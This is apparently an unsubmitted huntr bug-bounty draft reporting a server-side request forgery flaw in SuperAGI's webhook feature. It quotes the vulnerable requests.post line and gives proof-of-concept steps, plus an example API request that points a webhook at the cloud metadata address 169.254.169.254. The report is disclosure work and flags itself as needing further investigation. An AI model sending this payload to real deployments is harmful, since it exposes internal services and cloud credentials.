# SuperAGI — SSRF via user-configurable webhook URL without destination validation STATUS: ALMOST_REPORT (needs investigation; do not submit) readiness: NEEDS_INVESTIGATION program: SuperAGI | platform: huntr | repo: TransformerOptimus/SuperAGI | commit: 2026-02-13-scan ```` Repository URL: https://github.com/TransformerOptimus/SuperAGI Package Manager: pip Version Affected: latest (observed in 2026-02-13 scan) Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS: Attack Vector: Network Attack Complexity: Low Privileges Required: Low User Interaction: None Scope: Changed Confidentiality: High Integrity: Low Availability: Low Title: Webhook feature allows server requests to attacker-chosen internal URLs Impact: Attackers can probe internal network services, reach cloud metadata endpoints, and potentially exfiltrate sensitive infrastructure data depending on reachable targets. Description: # Description SuperAGI allows users to register webhook URLs. On status events, backend code issues `requests.post()` to the configured URL without SSRF protections (no private-IP filtering, allowlist, or scheme restrictions visible at sink). Observed sink: ```python request = requests.post(webhook_obj.url.strip(), data=json.dumps(webhook_obj_body), headers=webhook_obj.headers) ``` Webhook creation stores user-provided URL and headers directly. # Proof of Concept 1. Create a webhook via API with URL set to collaborator server (verification) or internal target. 2. Trigger an event that dispatches webhook notifications. 3. Observe incoming request from SuperAGI server. 4. Repeat with internal URL to confirm SSRF behavior. Example payload: ```http POST /api/webhooks/add Content-Type: application/json { "name": "ssrf-test", "url": "http://169.254.169.254/latest/meta-data/", "headers": {"X-Test":"1"}, "filters": {"status": ["RUNNING"]} } ``` Expected vulnerable behavior: backend performs server-side HTTP request to attacker-supplied destination. ### Impact Attackers can probe internal network services, reach cloud metadata endpoints, and potentially exfiltrate sensitive infrastructure data depending on reachable targets. ### Occurrences ``` Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/main/superagi/helper/webhook_manager.py#L28 Description: requests.post is called on user-configured webhook URL Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/main/superagi/controllers/webhook.py#L64-L65 Description: webhook URL/headers are accepted from request and persisted ``` ### References ``` URL: https://cwe.mitre.org/data/definitions/918.html Name: CWE-918: Server-Side Request Forgery (SSRF) URL: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery Name: OWASP SSRF overview URL: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html Name: OWASP SSRF Prevention Cheat Sheet ``` Occurrences: Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/main/superagi/helper/webhook_manager.py#L28 Description: requests.post is called on user-configured webhook URL Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/main/superagi/controllers/webhook.py#L64-L65 Description: webhook URL/headers are accepted from request and persisted References: URL: https://cwe.mitre.org/data/definitions/918.html Name: CWE-918: Server-Side Request Forgery (SSRF) URL: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery Name: OWASP SSRF overview URL: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html Name: OWASP SSRF Prevention Cheat Sheet ````